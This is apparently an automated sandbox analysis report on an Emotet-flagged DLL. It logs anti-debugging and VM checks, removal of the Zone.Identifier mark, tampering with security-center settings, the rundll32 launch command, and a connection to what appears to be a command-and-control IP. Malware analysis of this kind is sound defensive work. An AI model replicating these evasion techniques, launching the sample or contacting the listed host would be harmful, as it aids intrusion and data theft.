                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.503577553.0000000004C71000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.529381238.00000000049C1000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000013.00000002.513347635.00000000028F2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.524895289.000000000296C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.524500782.000000000296C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE96A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005213E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE96A93 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006D13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033D13E7 push esi; retf
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029613E7 push esi; retf
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE7E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzgJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qfdohhzjskeoxat\kmkxxcep.fzg:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WerFault.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\svchost.exe TID: 2376Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4192Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4252Thread sleep time: -90000s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE90927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE90927 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0297E2C8 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: Amcache.hve.19.drBinary or memory string: VMware
                      Source: Amcache.hve.19.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                      Source: Amcache.hve.19.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.19.drBinary or memory string: VMware7,1
                      Source: Amcache.hve.19.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.19.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.19.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: svchost.exe, 00000006.00000002.640818249.000001ECCBE48000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.640848244.000001ECCBE5E000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.542568874.000000000466D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.544208418.0000000004640000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.544260152.000000000466F000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.718992325.0000000002BAD000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000002.764113754.0000000002BAD000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.763567279.00000184DC0EF000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.761917887.00000184DC03C000.00000004.00000001.sdmp, svchost.exe, 00000026.00000002.762506607.00000184DC082000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.19.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.19.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: rundll32.exe, 00000019.00000002.763936612.0000000002B95000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW(
                      Source: Amcache.hve.19.drBinary or memory string: VMware, Inc.me
                      Source: Amcache.hve.19.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                      Source: svchost.exe, 00000006.00000002.640399065.000001ECC6629000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
                      Source: Amcache.hve.19.drBinary or memory string: VMware-42 35 bb 32 33 75 d2 27-52 00 3c e2 4b d4 32 71
                      Source: svchost.exe, 00000007.00000002.761991641.000002067B468000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.761427353.00000293E1229000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.540804894.0000000004647000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.19.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE90326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE7E690 WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,CreateMutexA,CloseHandle,ReleaseMutex,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE71290 GetProcessHeap,HeapAlloc,RtlAllocateHeap,HeapFree,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE89990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE8EC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE902CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE89920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE89920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_005307D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE89990 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE8EC0B mov ecx, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE902CC mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE89920 mov esi, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE89920 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_006E07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_033E07D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_029707D2 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE8A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE90326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE8AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE8A462 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE90326 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6EE8AB0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 308
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2616 -ip 2616
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 316
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
                      Source: loaddll32.exe, 00000000.00000000.494151990.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.515847002.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.495645602.0000000001C10000.00000002.00020000.sdmp, loaddll32.exe, 00000000.00000000.517132807.0000000001C10000.00000002.00020000.sdmp, rundll32.exe, 00000019.00000002.764558363.0000000002FE0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE8A584 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6EE8A755 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: Amcache.hve.19.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.19.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: svchost.exe, 0000000C.00000002.761941532.000002922263E000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000C.00000002.762220648.0000029222702000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.520000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.2960000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.33d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1523618.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2a521e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1523618.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.2a521e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.35f21e8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.35624d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.35624d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.14d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.33e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rundll32.exe.33d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.520000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.33e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2963508.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.2960000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.14d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.35f21e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1523618.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.14d0000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.2963508.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.490792818.00000000006D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.516872338.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.493687779.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.762912607.0000000002960000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.515626652.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.592715201.000000000354A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.515526987.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.471143849.000000000294A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.544935545.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.495396645.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.492232954.0000000002A3A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.475419249.0000000000520000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.495107069.00000000014D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.459775725.0000000000749000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.493911106.000000000151C000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.592655915.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.494249926.00000000035DA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.470997195.0000000000700000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.697774412.0000000002B7B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.494093661.00000000033E0000.00000040.00000010.sdmp, type: MEMORY
